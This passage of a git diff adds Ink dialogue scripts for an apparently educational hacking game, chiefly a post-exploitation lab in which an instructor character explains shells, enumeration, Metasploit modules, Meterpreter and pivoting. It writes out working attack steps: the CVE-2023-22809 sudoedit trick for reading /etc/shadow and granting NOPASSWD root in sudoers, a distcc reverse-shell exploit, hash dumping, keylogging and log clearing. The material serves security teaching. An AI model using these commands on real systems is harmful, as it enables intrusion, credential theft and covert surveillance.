simulations for defensive learning. Good luck, Agent {player_name}. + +-> end_session + +// =========================================== +// END SESSION +// =========================================== + +=== end_session === + +Social Engineering Specialist: Whenever you need guidance on social engineering techniques or ethical considerations, I'm available. + +{ethical_awareness_shown: + Social Engineering Specialist: I'm confident you'll use these skills responsibly. You've demonstrated solid ethical judgment. +} + +Social Engineering Specialist: Social engineering exploits human nature. Understanding these attacks makes you a better defender—and a more effective penetration tester within authorized engagements. + +Social Engineering Specialist: Now demonstrate what you've learned. And remember: authorized testing only. + +#exit_conversation +-> END diff --git a/story_design/ink/game_scenarios/post_exploitation.ink b/story_design/ink/game_scenarios/post_exploitation.ink new file mode 100644 index 0000000..93b1fa1 --- /dev/null +++ b/story_design/ink/game_scenarios/post_exploitation.ink @@ -0,0 +1,906 @@ +// Post-exploitation Lab Sheet +// Based on HacktivityLabSheets: introducing_attacks/7_post-exploitation.md +// Author: Z. Cliffe Schreuders, Anatoliy Gorbenko, Thalita Vergilio +// License: CC BY-SA 4.0 + +// Global persistent state +VAR instructor_rapport = 0 +VAR post_exploit_mastery = 0 + +// External variables +EXTERNAL player_name + +=== start === +Advanced Tactics Instructor: Welcome, Agent {player_name}. I'm your instructor for Post-Exploitation Techniques. + +~ instructor_rapport = 0 +~ post_exploit_mastery = 0 + +Advanced Tactics Instructor: Post-exploitation is what happens after you gain initial access. It's about leveraging that foothold to gather information, escalate privileges, and achieve your objectives. + +Advanced Tactics Instructor: Once an attacker has compromised a system, they can misuse the privileges they've appropriated to take further actions - or go on to compromise other connected systems. + +Advanced Tactics Instructor: This lab completes the attack lifecycle - from initial exploitation through privilege escalation, information gathering, and pivoting to other systems. + +Advanced Tactics Instructor: Remember: these are powerful techniques for authorized penetration testing and defensive security only. + +~ post_exploit_mastery += 10 + +-> post_exploit_hub + +=== post_exploit_hub === +Advanced Tactics Instructor: What aspect of post-exploitation would you like to explore? + ++ [What is post-exploitation?] + -> post_exploit_intro ++ [Understanding shell access] + -> shell_access ++ [Assessing your level of access] + -> assessing_access ++ [Post-exploitation information gathering] + -> info_gathering ++ [Privilege escalation techniques] + -> privilege_escalation ++ [Using the sudo vulnerability (CVE-2023-22809)] + -> sudo_vulnerability ++ [Metasploit post-exploitation modules] + -> msf_post_modules ++ [Introduction to Meterpreter] + -> meterpreter_intro ++ [Meterpreter spyware features] + -> meterpreter_spyware ++ [Pivoting and port forwarding] + -> pivoting ++ [Maintaining access and covering tracks] + -> persistence_evasion ++ [Show me the commands reference] + -> commands_reference ++ [Practical challenge tips] + -> challenge_tips ++ [I'm ready for the lab exercises] + -> ready_for_practice ++ [That's all for now] + #exit_conversation + -> END + +=== post_exploit_intro === +Advanced Tactics Instructor: Post-exploitation is everything that happens after you successfully compromise a system. + +~ instructor_rapport += 5 + +Advanced Tactics Instructor: The initial exploit gives you a foothold - usually limited access as whatever user account the vulnerable software was running as. + +Advanced Tactics Instructor: From there, you need to: +understand what level of access you have, gather information about the system, escalate privileges if possible, collect sensitive data, maintain access, and potentially pivot to other systems. + ++ [Why not just stop after getting shell access?] + Advanced Tactics Instructor: Initial access is often limited. You might be running as a low-privilege user, not an administrator. + + Advanced Tactics Instructor: You need to understand the system, find sensitive data, escalate to higher privileges, and ensure you can maintain access. + + Advanced Tactics Instructor: In a real penetration test, you're demonstrating impact - showing what an attacker could actually DO with that access. + + Advanced Tactics Instructor: That means accessing sensitive files, dumping credentials, and potentially moving laterally to other systems. + + ~ instructor_rapport += 5 + ++ [What determines what you can do post-exploitation?] + Advanced Tactics Instructor: Several factors determine your capabilities: + + Advanced Tactics Instructor: First, the type of payload you used. A simple shell gives you command execution. Meterpreter gives you advanced features. + + Advanced Tactics Instructor: Second, the security context - what user account is the vulnerable software running as? + + Advanced Tactics Instructor: Third, the access controls in place. Are there additional restrictions beyond standard user permissions? + + Advanced Tactics Instructor: Finally, your skill at the command line and understanding of the operating system. + + ~ instructor_rapport += 5 + +- -> post_exploit_hub + +=== shell_access === +Advanced Tactics Instructor: Shell access means you have access to a command line interface on the target system. + +~ instructor_rapport += 5 + +Advanced Tactics Instructor: On Windows, this is typically a Command Prompt or PowerShell. On Unix/Linux systems, it's usually a Bash shell. + +Advanced Tactics Instructor: Sometimes you'll see a familiar prompt. Other times you won't see any prompt at all, but you can still type commands and see output. + ++ [What can I do with shell access?] + Advanced Tactics Instructor: With shell access, you can run almost any command-line program available on the system. + + Advanced Tactics Instructor: You can list files, read documents, run scripts, check system information, create new files, and much more. + + Advanced Tactics Instructor: However, you're limited by the permissions of whatever user account you're running as. + + Advanced Tactics Instructor: If you're a normal user, you can't access administrator-only files or install system-wide software. + + ~ instructor_rapport += 5 + ++ [What commands should I avoid?] + Advanced Tactics Instructor: Avoid interactive programs that expect keyboard input and draw to the screen. + + Advanced Tactics Instructor: For example, on Linux use "cat" instead of "less", because less expects you to scroll and press 'q' to quit. + + Advanced Tactics Instructor: Avoid programs that run continuously until stopped, like "ping" without a count limit. + + Advanced Tactics Instructor: Also be careful with Ctrl-C - it will likely kill your shell connection rather than just the current command. + + ~ instructor_rapport += 5 + ++ [What's the difference between shells on Windows and Linux?] + Advanced Tactics Instructor: Windows shells typically use backslashes in paths (C:\\Users\\), while Linux uses forward slashes (/home/). + + Advanced Tactics Instructor: Common Windows commands: dir, type, net user, whoami, ipconfig + + Advanced Tactics Instructor: Common Linux commands: ls, cat, whoami, id, ifconfig (or ip a) + + Advanced Tactics Instructor: The privilege model is different too - Windows has Administrator/System, Linux has root (UID 0). + + ~ instructor_rapport += 5 + +- -> post_exploit_hub + +=== assessing_access === +Advanced Tactics Instructor: The first question after exploitation is: what level of access do I have? + +~ instructor_rapport += 5 + +Advanced Tactics Instructor: You need to determine what user account you're running as and what privileges that account has. + +Advanced Tactics Instructor: On Windows, you might have Administrator, System, or a regular user account. On Linux, you want to know if you're root (UID 0) or a normal user. + ++ [How do I check my access level on Linux?] + Advanced Tactics Instructor: Use these commands to assess your Linux access: + + Advanced Tactics Instructor: whoami - Shows your username + + Advanced Tactics Instructor: id - Shows your user ID (UID), group ID (GID), and groups + + Advanced Tactics Instructor: id -u - Shows just the UID. A UID of 0 means you're root! + + Advanced Tactics Instructor: Any other UID means you're a normal user with standard access controls applying. + + ~ instructor_rapport += 5 + ++ [How do I check my access level on Windows?] + Advanced Tactics Instructor: On Windows, you can use: + + Advanced Tactics Instructor: whoami - Shows your username and domain + + Advanced Tactics Instructor: whoami /priv - Shows your privileges + + Advanced Tactics Instructor: net user USERNAME - Shows details about a user account + + Advanced Tactics Instructor: If you have Meterpreter: getuid and getprivs give detailed privilege information. + + ~ instructor_rapport += 5 + ++ [What if I don't have root or Administrator access?] + Advanced Tactics Instructor: That's very common! Most services run as unprivileged users for security reasons. + + Advanced Tactics Instructor: You can still access files that user can read, which might include sensitive data. + + Advanced Tactics Instructor: You can gather system information to look for privilege escalation opportunities. + + Advanced Tactics Instructor: On Linux, try accessing /etc/shadow - if you can't, that confirms you're not root. + + Advanced Tactics Instructor: Then you'll want to look for privilege escalation vulnerabilities. + + ~ instructor_rapport += 5 + +- -> post_exploit_hub + +=== info_gathering === +Advanced Tactics Instructor: Information gathering continues even after exploitation. Understanding the system helps you plan your next moves. + +~ instructor_rapport += 5 + +Advanced Tactics Instructor: You want to learn about the operating system, installed software, network configuration, running processes, and other users. + ++ [What system information should I gather on Linux?] + Advanced Tactics Instructor: Key commands for Linux information gathering: + + Advanced Tactics Instructor: uname -a (kernel version and architecture) + + Advanced Tactics Instructor: cat /proc/cpuinfo (CPU details) + + Advanced Tactics Instructor: free -h (memory usage) + + Advanced Tactics Instructor: df -h (disk usage and partitions) + + Advanced Tactics Instructor: env (environment variables) + + Advanced Tactics Instructor: cat /etc/passwd (list of user accounts) + + Advanced Tactics Instructor: This information helps you understand the target and identify potential attack vectors. + + ~ instructor_rapport += 5 + ++ [Why check the sudo version?] + Advanced Tactics Instructor: The sudo command allows users to run commands with elevated privileges. + + Advanced Tactics Instructor: Check the version with: sudo --version + + Advanced Tactics Instructor: Certain versions of sudo have critical security vulnerabilities that allow privilege escalation! + + Advanced Tactics Instructor: For example, CVE-2023-22809 affects sudo versions 1.8.0 through 1.9.12p1. + + Advanced Tactics Instructor: Finding a vulnerable sudo version is a goldmine for privilege escalation. + + ~ instructor_rapport += 5 + ++ [What network information is useful?] + Advanced Tactics Instructor: Network information reveals what other systems you might be able to reach: + + Advanced Tactics Instructor: ifconfig or ip a (network interfaces and IP addresses) + + Advanced Tactics Instructor: netstat -an or ss -an (active connections and listening ports) + + Advanced Tactics Instructor: route or ip route (routing table) + + Advanced Tactics Instructor: cat /etc/resolv.conf (DNS configuration) + + Advanced Tactics Instructor: This helps you identify other systems to pivot to or internal networks to explore. + + ~ instructor_rapport += 5 + +- -> post_exploit_hub + +=== privilege_escalation === +Advanced Tactics Instructor: Privilege escalation means gaining additional privileges you weren't intentionally granted. + +~ instructor_rapport += 5 + +Advanced Tactics Instructor: Vertical privilege escalation is going from normal user to administrator/root. Horizontal privilege escalation is accessing resources of another user at the same privilege level. + +Advanced Tactics Instructor: Privilege escalation exploits vulnerabilities in the kernel, system software, or misconfigurations. + ++ [What are common privilege escalation vectors?] + Advanced Tactics Instructor: Common privilege escalation opportunities include: + + Advanced Tactics Instructor: Vulnerable kernel versions with known local exploits + + Advanced Tactics Instructor: Vulnerable system software like sudo, polkit, or services + + Advanced Tactics Instructor: Misconfigured SUID binaries on Linux + + Advanced Tactics Instructor: Weak file permissions on sensitive files + + Advanced Tactics Instructor: Scheduled tasks running as administrators + + Advanced Tactics Instructor: Credentials stored in plaintext or easily crackable formats + + ~ instructor_rapport += 5 + ++ [How do I find privilege escalation opportunities?] + Advanced Tactics Instructor: Systematic enumeration is key: + + Advanced Tactics Instructor: Check kernel and software versions against CVE databases + + Advanced Tactics Instructor: Look for SUID binaries: find / -perm -4000 2>/dev/null + + Advanced Tactics Instructor: Check sudo permissions: sudo -l + + Advanced Tactics Instructor: Look for world-writable files in sensitive directories + + Advanced Tactics Instructor: Check for credentials in config files, bash history, and environment variables + + ~ instructor_rapport += 5 + ++ [Tell me about the sudo vulnerability] + -> sudo_vulnerability + +- -> post_exploit_hub + +=== sudo_vulnerability === +Advanced Tactics Instructor: CVE-2023-22809 is a critical sudo vulnerability affecting versions 1.8.0 through 1.9.12p1. + +~ instructor_rapport += 5 + +Advanced Tactics Instructor: The vulnerability is in sudoedit, which allows editing files with elevated privileges. + +Advanced Tactics Instructor: By manipulating environment variables, you can trick sudoedit into opening files you shouldn't have access to. + ++ [How does this vulnerability work?] + Advanced Tactics Instructor: The vulnerability exploits how sudoedit processes the EDITOR environment variable. + + Advanced Tactics Instructor: Normally, sudoedit restricts which files you can edit. But a coding mistake means you can use "--" to specify additional files. + + Advanced Tactics Instructor: For example: EDITOR='cat -- /etc/shadow' sudoedit /etc/hosts + + Advanced Tactics Instructor: This tells sudoedit to use "cat" as the editor and tricks it into opening /etc/shadow with root privileges! + + Advanced Tactics Instructor: The /etc/hosts file is just a decoy to satisfy sudoedit's normal operation. + + ~ instructor_rapport += 5 + ++ [How can I use this to escalate privileges?] + Advanced Tactics Instructor: First, you can read sensitive files: EDITOR='cat -- /etc/shadow' sudoedit /etc/hosts + + Advanced Tactics Instructor: This gives you password hashes which you might crack offline. + + Advanced Tactics Instructor: More powerfully, you can edit the sudoers file: EDITOR='vim -- /etc/sudoers' sudoedit /etc/hosts + + Advanced Tactics Instructor: Add a line like: distccd ALL=(ALL) NOPASSWD:ALL + + Advanced Tactics Instructor: This allows your user to run any command as root without a password: sudo -i + + Advanced Tactics Instructor: Now you're root! + + ~ instructor_rapport += 5 + ++ [What's tricky about exploiting this?] + Advanced Tactics Instructor: The challenge is that your simple shell doesn't support full interactive programs well. + + Advanced Tactics Instructor: When you use vim to edit /etc/sudoers, the display will be distorted and arrow keys won't work properly. + + Advanced Tactics Instructor: You need to carefully use vim commands without visual feedback: +"G" then "o" to go to bottom and insert new line, type your new line, "Esc" then ":x" to save. + + Advanced Tactics Instructor: Be very careful - if you corrupt /etc/sudoers, you'll break the VM! + + ~ instructor_rapport += 5 + +- -> post_exploit_hub + +=== msf_post_modules === +Advanced Tactics Instructor: Metasploit has numerous post-exploitation modules for automated information gathering and attacks. + +~ instructor_rapport += 5 + +Advanced Tactics Instructor: These modules run against established sessions to collect data, escalate privileges, or set up persistence. + +Advanced Tactics Instructor: They're categorized by operating system and function: gather, escalate, manage, recon, and more. + ++ [How do I use post-exploitation modules?] + Advanced Tactics Instructor: First, you need an active session. Background it with Ctrl-Z. + + Advanced Tactics Instructor: Check your session ID: sessions + + Advanced Tactics Instructor: Select a post module: use post/linux/gather/checkvm + + Advanced Tactics Instructor: Set the session: setg SESSION 1 (or your session ID) + + Advanced Tactics Instructor: Using "setg" sets it globally, so you don't have to set it for each module. + + Advanced Tactics Instructor: Run the module: exploit (or run) + + ~ instructor_rapport += 5 + ++ [What useful post-exploitation modules exist?] + Advanced Tactics Instructor: For Linux targets, valuable modules include: + + Advanced Tactics Instructor: post/linux/gather/checkvm - Detect if running in a VM + + Advanced Tactics Instructor: post/linux/gather/enum_configs - Download config files + + Advanced Tactics Instructor: post/linux/gather/enum_network - Network configuration + + Advanced Tactics Instructor: post/linux/gather/enum_system - System and software information + + Advanced Tactics Instructor: post/linux/gather/enum_users_history - Command history and logs + + Advanced Tactics Instructor: post/linux/gather/hashdump - Dump password hashes + + ~ instructor_rapport += 5 + ++ [Where does collected information get stored?] + Advanced Tactics Instructor: Post-exploitation modules store collected data as "loot" in Metasploit's database. + + Advanced Tactics Instructor: The module output tells you where files are saved, usually in ~/.msf4/loot/ + + Advanced Tactics Instructor: You can view loot with: loot + + Advanced Tactics Instructor: Files are timestamped and categorized, making it easy to review later for report writing. + + ~ instructor_rapport += 5 + +- -> post_exploit_hub + +=== meterpreter_intro === +Advanced Tactics Instructor: Meterpreter is an advanced payload originally developed by Matt Miller (Skape). + +~ instructor_rapport += 5 + +Advanced Tactics Instructor: Unlike a simple shell, Meterpreter provides a sophisticated remote administration framework with many built-in features. + +Advanced Tactics Instructor: It's dynamically extensible - features can be loaded as needed. By default, it encrypts all communications. + ++ [What makes Meterpreter special?] + Advanced Tactics Instructor: Meterpreter has numerous advantages over basic shells: + + Advanced Tactics Instructor: Runs entirely in memory - doesn't write to disk, making forensics harder + + Advanced Tactics Instructor: Encrypted communications by default + + Advanced Tactics Instructor: Rich command set for file browsing, process manipulation, network operations + + Advanced Tactics Instructor: Can migrate between processes to hide or achieve persistence + + Advanced Tactics Instructor: Extensible with post-exploitation modules + + Advanced Tactics Instructor: Includes "spyware" features like keylogging and screen capture + + ~ instructor_rapport += 5 + ++ [How do I use Meterpreter commands?] + Advanced Tactics Instructor: Start by viewing available commands: help + + Advanced Tactics Instructor: Get current privileges: getuid and getprivs + + Advanced Tactics Instructor: Browse files: ls c:/ (Windows) or ls / (Linux) + + Advanced Tactics Instructor: Download files: download /path/to/file + + Advanced Tactics Instructor: Upload files: upload /local/file /remote/file + + Advanced Tactics Instructor: View processes: ps + + Advanced Tactics Instructor: Migrate to another process: migrate PID + + Advanced Tactics Instructor: Drop to a system shell: shell (Ctrl-D to return to Meterpreter) + + ~ instructor_rapport += 5 + ++ [How does Meterpreter avoid detection?] + Advanced Tactics Instructor: Meterpreter is designed for stealth: + + Advanced Tactics Instructor: It stays in memory and doesn't write files to disk (fileless malware) + + Advanced Tactics Instructor: By default it masquerades as "svchost.exe" on Windows, a common legitimate process + + Advanced Tactics Instructor: It can migrate into other running processes, making it hard to identify + + Advanced Tactics Instructor: Communications are encrypted, making network monitoring less effective + + Advanced Tactics Instructor: However, modern endpoint detection systems can still identify Meterpreter through behavioral analysis. + + ~ instructor_rapport += 5 + +- -> post_exploit_hub + +=== meterpreter_spyware === +Advanced Tactics Instructor: Meterpreter includes features typically associated with spyware - monitoring user activity without their knowledge. + +~ instructor_rapport += 5 + +Advanced Tactics Instructor: These features can capture keystrokes, screenshots, and even webcam feeds. + +Advanced Tactics Instructor: While concerning for privacy, they're useful for security testing to demonstrate the risk of compromise. + ++ [How does keylogging work in Meterpreter?] + Advanced Tactics Instructor: Meterpreter can capture all keystrokes on the target system. + + Advanced Tactics Instructor: In Armitage: Right-click target → Meterpreter → Explore → Log Keystrokes + + Advanced Tactics Instructor: Set CAPTURE_TYPE to "winlogon" to capture login attempts + + Advanced Tactics Instructor: Via command line: keyscan_start (then keyscan_dump to view results) + + Advanced Tactics Instructor: This captures everything typed - passwords, emails, documents, searches. + + ~ instructor_rapport += 5 + ++ [How do I capture screenshots?] + Advanced Tactics Instructor: Screenshots show what the user is viewing: + + Advanced Tactics Instructor: screenshot - Captures current screen + + Advanced Tactics Instructor: The image is downloaded to your Kali system and automatically opened + + Advanced Tactics Instructor: This can reveal sensitive documents, credentials, or user behavior + + Advanced Tactics Instructor: In Armitage, there are menu options for screen capture in the Meterpreter menu. + + ~ instructor_rapport += 5 + ++ [Can I get full graphical control?] + Advanced Tactics Instructor: Yes! You can use VNC for full graphical remote control: + + Advanced Tactics Instructor: In Armitage: Right-click target → Meterpreter → Interact → Desktop (VNC) + + Advanced Tactics Instructor: Armitage starts a VNC server on the target and tells you the port + + Advanced Tactics Instructor: Connect with: vncviewer 127.0.0.1:PORT + + Advanced Tactics Instructor: You'll see and control the target's desktop just like sitting at their keyboard! + + Advanced Tactics Instructor: This is powerful but obvious to any user who's watching their screen. + + ~ instructor_rapport += 5 + +- -> post_exploit_hub + +=== pivoting === +Advanced Tactics Instructor: Pivoting means using a compromised system as a stepping stone to attack other systems. + +~ instructor_rapport += 5 + +Advanced Tactics Instructor: Often attackers can't directly reach internal systems - firewalls, NAT, and network segmentation block direct access. + +Advanced Tactics Instructor: But if you compromise a system that CAN reach those internal systems, you can route your attacks through it. + ++ [Why would I need to pivot?] + Advanced Tactics Instructor: Several scenarios require pivoting: + + Advanced Tactics Instructor: Attacking internal systems from a compromised public-facing server + + Advanced Tactics Instructor: Accessing networks behind firewalls or NAT + + Advanced Tactics Instructor: Moving laterally through a corporate network + + Advanced Tactics Instructor: Hiding your true origin by routing through multiple compromised hosts + + Advanced Tactics Instructor: In real penetration tests, you often start from a DMZ server and need to pivot to reach critical internal systems. + + ~ instructor_rapport += 5 + ++ [How does Meterpreter pivoting work?] + Advanced Tactics Instructor: Meterpreter can set up routing so all your attacks go through a compromised host. + + Advanced Tactics Instructor: In Armitage: Right-click compromised host → Meterpreter → Pivoting → Setup → Add Pivot + + Advanced Tactics Instructor: Via command line, you use the "route" command in msfconsole + + Advanced Tactics Instructor: Once configured, any Metasploit attacks you launch will be routed through that system + + Advanced Tactics Instructor: The pivoted attacks will appear to come from the compromised system, not your Kali VM. + + ~ instructor_rapport += 5 + ++ [What's port forwarding?] + Advanced Tactics Instructor: Port forwarding is a simpler form of pivoting. + + Advanced Tactics Instructor: You instruct a compromised system to listen on a port and forward connections to a different host and port. + + Advanced Tactics Instructor: For example, forward local port 8080 to an internal web server on 10.0.0.5:80 + + Advanced Tactics Instructor: This makes the internal service accessible through the compromised system. + + Advanced Tactics Instructor: Meterpreter's portfwd command handles this: portfwd add -l 8080 -p 80 -r 10.0.0.5 + + ~ instructor_rapport += 5 + +- -> post_exploit_hub + +=== persistence_evasion === +Advanced Tactics Instructor: Maintaining access and covering tracks are advanced post-exploitation techniques. + +~ instructor_rapport += 5 + +Advanced Tactics Instructor: Persistence means ensuring you can regain access even if the system reboots or the service is restarted. + +Advanced Tactics Instructor: Covering tracks means removing evidence of the attack from logs and the filesystem. + ++ [How do attackers maintain access?] + Advanced Tactics Instructor: Common persistence mechanisms include: + + Advanced Tactics Instructor: Creating new user accounts with administrative privileges + + Advanced Tactics Instructor: Installing backdoors that run on boot (services, scheduled tasks, startup scripts) + + Advanced Tactics Instructor: Modifying SSH authorized_keys to allow your key + + Advanced Tactics Instructor: Installing rootkits that hide processes and files + + Advanced Tactics Instructor: Meterpreter has post-exploitation modules specifically for persistence. + + ~ instructor_rapport += 5 + ++ [How do you cover your tracks?] + Advanced Tactics Instructor: Covering tracks involves removing or modifying evidence: + + Advanced Tactics Instructor: Clearing log files (on Linux: /var/log/auth.log, /var/log/syslog, etc.) + + Advanced Tactics Instructor: Clearing command history (bash history, PowerShell history) + + Advanced Tactics Instructor: Removing uploaded tools and malware + + Advanced Tactics Instructor: Modifying file timestamps to match surrounding files + + Advanced Tactics Instructor: However, sophisticated forensics can often detect these modifications. + + ~ instructor_rapport += 5 + ++ [Does Meterpreter have anti-forensics features?] + Advanced Tactics Instructor: Yes, Meterpreter is designed with anti-forensics in mind: + + Advanced Tactics Instructor: It runs in memory without writing to disk (fileless) + + Advanced Tactics Instructor: It can migrate between processes, making it hard to find + + Advanced Tactics Instructor: Communications are encrypted + + Advanced Tactics Instructor: There are modules to clear event logs: clearev + + Advanced Tactics Instructor: However, modern endpoint detection and response (EDR) tools can detect Meterpreter through behavioral analysis. + + ~ instructor_rapport += 5 + +- -> post_exploit_hub + +=== commands_reference === +Advanced Tactics Instructor: Let me provide a comprehensive post-exploitation commands reference. + +~ instructor_rapport += 5 + +Advanced Tactics Instructor: **Initial Exploitation (Distcc example):** + +Advanced Tactics Instructor: nmap -p 1-65535 TARGET (scan all ports) + +Advanced Tactics Instructor: msfconsole + +Advanced Tactics Instructor: search distccd + +Advanced Tactics Instructor: use exploit/unix/misc/distcc_exec + +Advanced Tactics Instructor: set RHOST TARGET_IP + +Advanced Tactics Instructor: set PAYLOAD cmd/unix/reverse + +Advanced Tactics Instructor: set LHOST YOUR_IP + +Advanced Tactics Instructor: exploit + ++ [Show me access assessment commands] + Advanced Tactics Instructor: **Assessing Access Level:** + + Advanced Tactics Instructor: whoami (show username) + + Advanced Tactics Instructor: id (show UID, GID, groups) + + Advanced Tactics Instructor: id -u (show just UID - 0 means root) + + Advanced Tactics Instructor: cat /etc/shadow (try to read - if fails, not root) + + ~ instructor_rapport += 3 + ++ [Show me information gathering commands] + Advanced Tactics Instructor: **Information Gathering (Linux):** + + Advanced Tactics Instructor: env (environment variables) + + Advanced Tactics Instructor: uname -a (kernel version) + + Advanced Tactics Instructor: cat /proc/cpuinfo (CPU info) + + Advanced Tactics Instructor: free -h (memory) + + Advanced Tactics Instructor: df -h (disk space) + + Advanced Tactics Instructor: cat /etc/passwd (user accounts) + + Advanced Tactics Instructor: sudo --version (check for vulnerable sudo) + + Advanced Tactics Instructor: ifconfig or ip a (network interfaces) + + ~ instructor_rapport += 3 + ++ [Show me privilege escalation commands] + Advanced Tactics Instructor: **Privilege Escalation (CVE-2023-22809):** + + Advanced Tactics Instructor: EDITOR='cat -- /etc/shadow' sudoedit /etc/hosts + + Advanced Tactics Instructor: (View password hashes) + + Advanced Tactics Instructor: EDITOR='vim -- /etc/sudoers' sudoedit /etc/hosts + + Advanced Tactics Instructor: (Edit sudoers file - be very careful!) + + Advanced Tactics Instructor: In vim: Press Enter, type "Go", press Enter, type "distccd ALL=(ALL) NOPASSWD:ALL" + + Advanced Tactics Instructor: Press Esc, type ":x", press Enter, press Esc, type ":q!", press Enter + + Advanced Tactics Instructor: sudo -i (escalate to root) + + ~ instructor_rapport += 3 + ++ [Show me Linux admin commands] + Advanced Tactics Instructor: **Linux Post-Exploitation:** + + Advanced Tactics Instructor: useradd USERNAME (create user) + + Advanced Tactics Instructor: passwd USERNAME (set password) + + Advanced Tactics Instructor: cat /etc/passwd (list users) + + Advanced Tactics Instructor: sh (spawn command interpreter) + + ~ instructor_rapport += 3 + ++ [Show me Metasploit post modules] + Advanced Tactics Instructor: **Metasploit Post-Exploitation:** + + Advanced Tactics Instructor: Ctrl-Z (background session) + + Advanced Tactics Instructor: sessions (list sessions) + + Advanced Tactics Instructor: use post/linux/gather/checkvm + + Advanced Tactics Instructor: setg SESSION 1 + + Advanced Tactics Instructor: exploit + + Advanced Tactics Instructor: **Useful Post Modules:** + + Advanced Tactics Instructor: post/linux/gather/enum_configs + + Advanced Tactics Instructor: post/linux/gather/enum_network + + Advanced Tactics Instructor: post/linux/gather/enum_system + + Advanced Tactics Instructor: post/linux/gather/enum_users_history + + Advanced Tactics Instructor: post/linux/gather/hashdump + + ~ instructor_rapport += 3 + ++ [Show me Meterpreter commands] + Advanced Tactics Instructor: **Meterpreter Commands:** + + Advanced Tactics Instructor: help (list all commands) + + Advanced Tactics Instructor: getuid (current user) + + Advanced Tactics Instructor: getprivs (privileges) + + Advanced Tactics Instructor: ls c:/ (browse files) + + Advanced Tactics Instructor: download FILE (download file) + + Advanced Tactics Instructor: upload LOCAL REMOTE (upload file) + + Advanced Tactics Instructor: ps (list processes) + + Advanced Tactics Instructor: migrate PID (migrate to process) + + Advanced Tactics Instructor: shell (drop to system shell, Ctrl-D to return) + + Advanced Tactics Instructor: run post/windows/gather/hashdump (dump hashes) + + Advanced Tactics Instructor: screenshot (capture screen) + + Advanced Tactics Instructor: keyscan_start / keyscan_dump (keylogging) + + ~ instructor_rapport += 3 + ++ [Show me Armitage commands] + Advanced Tactics Instructor: **Armitage Setup:** + + Advanced Tactics Instructor: sudo msfdb reinit + + Advanced Tactics Instructor: sudo armitage & + + Advanced Tactics Instructor: **Armitage Workflow:** + + Advanced Tactics Instructor: Hosts → Add Host → enter IP + + Advanced Tactics Instructor: Right-click host → Scan + + Advanced Tactics Instructor: Drag exploit onto target icon → Launch + + Advanced Tactics Instructor: Right-click compromised host → Meterpreter → Interact + + Advanced Tactics Instructor: **Pivoting:** + + Advanced Tactics Instructor: Right-click → Meterpreter → Pivoting → Setup → Add Pivot + + ~ instructor_rapport += 3 + +- -> post_exploit_hub + +=== challenge_tips === +Advanced Tactics Instructor: Let me give you practical tips for the post-exploitation challenges. + +~ instructor_rapport += 5 + +Advanced Tactics Instructor: **Exploiting Distcc:** + +Advanced Tactics Instructor: Scan all ports to find distcc: nmap -p- TARGET + +Advanced Tactics Instructor: Use exploit/unix/misc/distcc_exec with cmd/unix/reverse payload + +Advanced Tactics Instructor: You'll get a shell as the distccd user, not root. + ++ [Tips for privilege escalation?] + Advanced Tactics Instructor: Check the sudo version immediately: sudo --version + + Advanced Tactics Instructor: If it's vulnerable (1.8.0-1.9.12p1), use the CVE-2023-22809 exploit. + + Advanced Tactics Instructor: When editing /etc/sudoers with vim, follow the commands EXACTLY - one wrong keystroke can break the VM. + + Advanced Tactics Instructor: After editing sudoers, run: sudo -i to become root. + + Advanced Tactics Instructor: Verify with: id -u (should show 0) + + ~ instructor_rapport += 5 + ++ [Tips for using post-exploitation modules?] + Advanced Tactics Instructor: Always background your session first with Ctrl-Z + + Advanced Tactics Instructor: Use "setg SESSION ID" to set the session globally for all modules. + + Advanced Tactics Instructor: Run multiple enum modules to gather comprehensive information. + + Advanced Tactics Instructor: The output tells you where loot is stored - check those files! + + Advanced Tactics Instructor: Not all modules work perfectly - if one fails, move on to others. + + ~ instructor_rapport += 5 + ++ [Tips for using Meterpreter and Armitage?] + Advanced Tactics Instructor: Exploit the Windows server with easyftp to get a Meterpreter session. + + Advanced Tactics Instructor: Use getuid and getprivs to understand your privileges immediately. + + Advanced Tactics Instructor: Browse to user desktops to find flags: ls C:\\Users\\ + + Advanced Tactics Instructor: Try both Meterpreter commands and Armitage's GUI features. + + Advanced Tactics Instructor: If Meterpreter becomes unresponsive, restart the Windows VM and re-exploit. + + ~ instructor_rapport += 5 + ++ [Tips for pivoting?] + Advanced Tactics Instructor: Set up a pivot through the Windows system to attack Linux. + + Advanced Tactics Instructor: In Armitage: Right-click Windows → Meterpreter → Pivoting → Setup → Add Pivot + + Advanced Tactics Instructor: Add the Linux target: Hosts → Add Hosts → enter Linux IP + + Advanced Tactics Instructor: Scan and exploit through the pivot - it will be slower but will work. + + Advanced Tactics Instructor: The Armitage interface shows the routing path visually. + + ~ instructor_rapport += 5 + ++ [Where are the flags?] + Advanced Tactics Instructor: Linux flags are in user home directories under /home/ + + Advanced Tactics Instructor: Use find /home -name "*flag*" to search for them. + + Advanced Tactics Instructor: Windows flags are on user Desktops: C:\\Users\\USERNAME\\Desktop\\ + + Advanced Tactics Instructor: One Linux challenge involves cracking a protected.zip file. + + Advanced Tactics Instructor: You'll need to dump password hashes and crack them to get the zip password. + + ~ instructor_rapport += 5 + +- -> post_exploit_hub + +=== ready_for_practice === +Advanced Tactics Instructor: Excellent! You're ready for advanced post-exploitation techniques. + +~ instructor_rapport += 10 +~ post_exploit_mastery += 10 + +Advanced Tactics Instructor: This lab completes your understanding of the full attack lifecycle - from initial reconnaissance through exploitation to post-exploitation. + +Advanced Tactics Instructor: You'll exploit systems, escalate privileges, gather sensitive data, and pivot through networks. + +Advanced Tactics Instructor: Remember: these techniques are powerful and potentially destructive. Use them only for authorized penetration testing and defensive security. + ++ [Any final advice?] + Advanced Tactics Instructor: Work methodically. After each exploitation, assess your access, gather information, then escalate privileges. + + Advanced Tactics Instructor: Take careful notes of what you find - credentials, software versions, vulnerable services. + + Advanced Tactics Instructor: When using the sudo privilege escalation, follow the vim commands EXACTLY. Practice on a non-critical system first if you're nervous. + + Advanced Tactics Instructor: Explore both Meterpreter commands and Armitage's interface to see which you prefer. + + Advanced Tactics Instructor: Don't get frustrated if something doesn't work - exploit reliability varies. Try restarting VMs and trying again. + + Advanced Tactics Instructor: Most importantly: understand WHY each technique works, not just HOW to execute it. + + Advanced Tactics Instructor: Good luck, Agent {player_name}. This is where you demonstrate the full impact of system compromise. + + ~ instructor_rapport += 10 + +- -> post_exploit_hub + +-> END diff --git a/story_design/ink/game_scenarios/scanning.ink b/story_design/ink/game_scenarios/scanning.ink new file mode 100644 index 0000000..4e5633d --- /dev/null +++ b/story_design/ink/game_scenarios/scanning.ink @@ -0,0 +1,1008 @@ +// Information Gathering: Scanning Lab Sheet +// Based on 